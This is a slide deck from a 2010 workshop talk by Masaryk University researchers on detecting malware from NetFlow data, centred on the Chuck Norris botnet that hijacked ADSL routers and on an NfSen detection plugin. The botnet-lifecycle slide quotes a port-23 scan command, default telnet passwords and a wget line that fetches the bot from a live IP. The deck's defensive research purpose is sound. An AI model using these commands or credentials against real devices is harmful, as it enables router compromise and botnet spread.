Malware Detection From The Network Perspective Using NetFlow Data - - PowerPoint PPT Presentation

malware detection from the network perspective using
SMART_READER_LITE
LIVE PREVIEW

Malware Detection From The Network Perspective Using NetFlow Data - - PowerPoint PPT Presentation

Malware Detection From The Network Perspective Using NetFlow Data P. eleda, J. Vykopal, T. Plesnk, M. Truneka, V. Krmek {celeda|vykopal|plesnik|trunecka|vojtec}@ics.muni.cz 3rd NMRG Workshop on NetFlow/IPFIX Usage in Network


slide-1
SLIDE 1

Malware Detection From The Network Perspective Using NetFlow Data

  • P. Čeleda, J. Vykopal, T. Plesník, M. Trunečka, V. Krmíček

{celeda|vykopal|plesnik|trunecka|vojtec}@ics.muni.cz 3rd NMRG Workshop on NetFlow/IPFIX Usage in Network Management July 30, 2010, Maastricht, The Netherlands

slide-2
SLIDE 2

Part I Introduction

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 2 / 25

slide-3
SLIDE 3

Present Computer Security

Present Essentials and Best Practices host-based: firewall, antivirus, automated patching, NAC1 network-based: firewall, antispam filter, IDS2, UTM3 Network Security Monitoring Necessary complement to host-based approach. NBA4 is a key approach in large and high-speed networks. Traffic acquisition and storage is almost done, security analysis is a challenging task.

1Network Access Control, 2Intrusion Detection System 3Unified Threat Management, 4Network Behavior Analysis

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 3 / 25

slide-4
SLIDE 4

NetFlow Applications in Time

Originally Accounting

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 4 / 25

slide-5
SLIDE 5

NetFlow Applications in Time

Originally Accounting Then Incident handling Network forensics

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 4 / 25

slide-6
SLIDE 6

NetFlow Applications in Time

Originally Accounting Then Incident handling Network forensics Now Intrusion detection

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 4 / 25

slide-7
SLIDE 7

Masaryk University, Brno, Czech Republic

9 faculties: 200 departments and institutes 48 000 students and employees 15 000 networked hosts 2x 10 gigabit uplinks to CESNET

Interval Flows Packets Bytes Second 5 k 150 k 132 M Minute 300 k 9 M 8 G Hour 15 M 522 M 448 G Day 285 M 9.4 G 8 T Week 1.6 G 57 G 50 T Average traffic volume at the edge links in peak hours.

500000 1000000 1500000 Mon Tue Wed Thu Fri Sat Sun Number of Flows in MU Network (5-minute Window)

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 5 / 25

slide-8
SLIDE 8

NetFlow Monitoring at Masaryk University

FlowMon probe FlowMon probe FlowMon probe NetFlow data generation

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

slide-9
SLIDE 9

NetFlow Monitoring at Masaryk University

FlowMon probe FlowMon probe FlowMon probe NetFlow data generation NetFlow collector NetFlow v5/v9 NetFlow data collection

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

slide-10
SLIDE 10

NetFlow Monitoring at Masaryk University

FlowMon probe FlowMon probe FlowMon probe NetFlow data generation NetFlow collector NetFlow v5/v9 NetFlow data collection NetFlow data analyses SPAM detection worm/virus detection intrusion detection

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

slide-11
SLIDE 11

NetFlow Monitoring at Masaryk University

FlowMon probe FlowMon probe FlowMon probe NetFlow data generation NetFlow collector NetFlow v5/v9 NetFlow data collection NetFlow data analyses SPAM detection worm/virus detection intrusion detection http mail syslog incident reporting mailbox WWW syslog server

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

slide-12
SLIDE 12

Part II Malware Detection

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 7 / 25

slide-13
SLIDE 13

Malware Threats

Malware "software designed to infiltrate a computer system without the owner’s informed consent"5 computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, rootkits, ... Malware Threats infected ("zombie") computers used for criminal activities privacy data stealing, (D)DoS attacks, sending spam, hosting contraband, phising/pharming victims are end users, servers and the network infrastructure too

5Wikipedia

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 8 / 25

slide-14
SLIDE 14

Malware Detection Approaches

Host-Based Approach AVS, anti-spyware and anti-malware detection tools based on pattern matching and heuristics

  • nly local information from the computer

zero day attacks and morphing code often undetected Network-Based Approach

  • verview of the whole network behavior

high-level information about the state of the network use of NBA methods for malware detection

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 9 / 25

slide-15
SLIDE 15

Network Behavior Analysis (NBA)

NBA Principles identifies malware from network traffic statistics watch what’s happening inside the network single purpose detection patterns (scanning, botnets, ...) complex models of the network behavior statistical modeling, PCA6 NBA Advantages good for spotting new malware and zero day exploits suitable for high-speed networks should be used as an enhancement to the protection provided by the standard tools (firewall, IDS, AVS, ...)

6Principal Component Analysis

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 10 / 25

slide-16
SLIDE 16

NBA Example - MINDS Method

Features: Flow counts from/to important IP/port combinations. Malware identification: Comparison with windowed average of past values.

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 11 / 25

slide-17
SLIDE 17

Part III Chuck Norris Botnet in Nutshell

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 12 / 25

slide-18
SLIDE 18

Chuck Norris Botnet

Linux malware – IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices – ADSL modems and routers. Uses TELNET brute force attack as infection vector. Users are not aware about the malicious activities. Missing anti-malware solution to detect it.

Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris !

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 13 / 25

slide-19
SLIDE 19

Botnet Lifecycle

Scanning for vulnerable devices in predefined networks

IP prefixes of ADSL networks of worldwide operators network scanning – # pnscan -n30 88.102.106.0/24 23

Infection of a vulnerable device

TELNET dictionary attack – 15 default passwords admin, password, root, 1234, dreambox, blank password

IRC bot initialization

IRC bot download and execution on infected device wget http://87.98.163.86/pwn/syslgd;. . .

Botnet C&C operations

further bots spreading and C&C commands execution DNS spoofing and denial-of-service attacks

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 14 / 25

slide-20
SLIDE 20

Botnet Attacks

DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

slide-21
SLIDE 21

Botnet Attacks

DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect:

www.facebook.com www.google.com

Malicious code execution.

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

slide-22
SLIDE 22

Botnet Attacks

DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect:

www.facebook.com www.google.com

Malicious code execution.

OpenDNS.com botnet C&C Center

www.facebook.com

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

slide-23
SLIDE 23

Botnet Attacks

DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect:

www.facebook.com www.google.com

Malicious code execution.

OpenDNS.com botnet C&C Center

www.facebook.com

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

slide-24
SLIDE 24

Botnet Attacks

DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect:

www.facebook.com www.google.com

Malicious code execution.

OpenDNS.com botnet C&C Center

www.facebook.com www.linux.org

www.linux.org

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

slide-25
SLIDE 25

Botnet Size and Evaluation

Size estimation based on NetFlow data from Masaryk University. 33000 unique attackers (infected devices) from 10/2009 – 02/2010.

Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network

100000 200000 300000 400000 500000 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 500 1000 1500 2000 2500

Telnet Scans Against Masaryk University Network Unique Attackers

Telnet Scans Against Masaryk University Network

Unique attackers targeting the MU network Month Min Max Avr Mdn October 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 2004 414 354

Botnet stopped activity

  • n 23 February 2010.
  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 16 / 25

slide-26
SLIDE 26

Botnet Size and Evaluation

Size estimation based on NetFlow data from Masaryk University. 33000 unique attackers (infected devices) from 10/2009 – 02/2010.

Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network

100000 200000 300000 400000 500000 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 500 1000 1500 2000 2500

Telnet Scans Against Masaryk University Network Unique Attackers

Telnet Scans Against Masaryk University Network Unique Attackers

Unique attackers targeting the MU network Month Min Max Avr Mdn October 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 2004 414 354

Botnet stopped activity

  • n 23 February 2010.
  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 16 / 25

slide-27
SLIDE 27

Botnet Size and Evaluation

Size estimation based on NetFlow data from Masaryk University. 33000 unique attackers (infected devices) from 10/2009 – 02/2010.

Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network

100000 200000 300000 400000 500000 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 500 1000 1500 2000 2500

Telnet Scans Against Masaryk University Network Unique Attackers botnet discovery 2.12.2009 botnet shutdown 23.2.2010

Telnet Scans Against Masaryk University Network Unique Attackers

Unique attackers targeting the MU network Month Min Max Avr Mdn October 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 2004 414 354

Botnet stopped activity

  • n 23 February 2010.
  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 16 / 25

slide-28
SLIDE 28

Part IV Botnet Detection Plugin

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 17 / 25

slide-29
SLIDE 29

Botnet Detection Plugin

Introduction Detects Chuck Norris-like botnet behavior. Based on NetFlow and other network data sources. Plugin Architecture Compliant with NfSen plugins architecture recommendations. PHP frontend with a Perl backend and a PostreSQL DB. Web, e-mail and syslog detection output and reporting.

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 18 / 25

slide-30
SLIDE 30

Plugin Architecture

cndet.php

nfsend comm. interface

cndet.pm cndetdb.pm

BACKEND FRONTEND

PostgreSQL NetFlow data DNS WHOIS DB

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 19 / 25

slide-31
SLIDE 31

Detection Methods

Telnet Scan Detection Incoming and outgoing TCP SYN scans on port 23. Connections to Botnet Distribution Sites Bot’s web download requests from infected host. Connections to Botnet C&C Centers Bot’s IRC traffic with command and control centers. DNS Spoofing Attack Detection Communication with spoofed DNS servers and OpenDNS.

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 20 / 25

slide-32
SLIDE 32

Web Interface – Infected Host Detected

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 21 / 25

slide-33
SLIDE 33

Plugin Development Status

Current Version Development snapshot released – alpha version. Flow-based methods implemented. Import past NetFlow data to process with plugin. Web frontend output including DNS and whois information. Future Work Active detection of infected hosts (nmap). Further detection methods – DDoS activities, Telnet dictionary attack, . . .

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 22 / 25

slide-34
SLIDE 34

Part V Conclusion

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 23 / 25

slide-35
SLIDE 35

Conclusion

Motivation Everybody leaves traces in network traffic (you can’t hide). Observe and automatically inspect 24x7 your network data. Detect attacks before your hosts are infected. Experience Better network knowledge after you deploy NSM. NSM is essential in liberal network environments. Future We are open to research collaboration in NSM area. Our NSM tools and plugins are available on request.

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 24 / 25

slide-36
SLIDE 36

Thank You For Your Attention!

Pavel Čeleda et al.

celeda@ics.muni.cz

Project CYBER

http://www.muni.cz/ics/cyber

Malware Detection From The Network Perspective Using NetFlow Data

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.

  • P. Čeleda et al.

Malware Detection From The Network Perspective Using NetFlow Data 25 / 25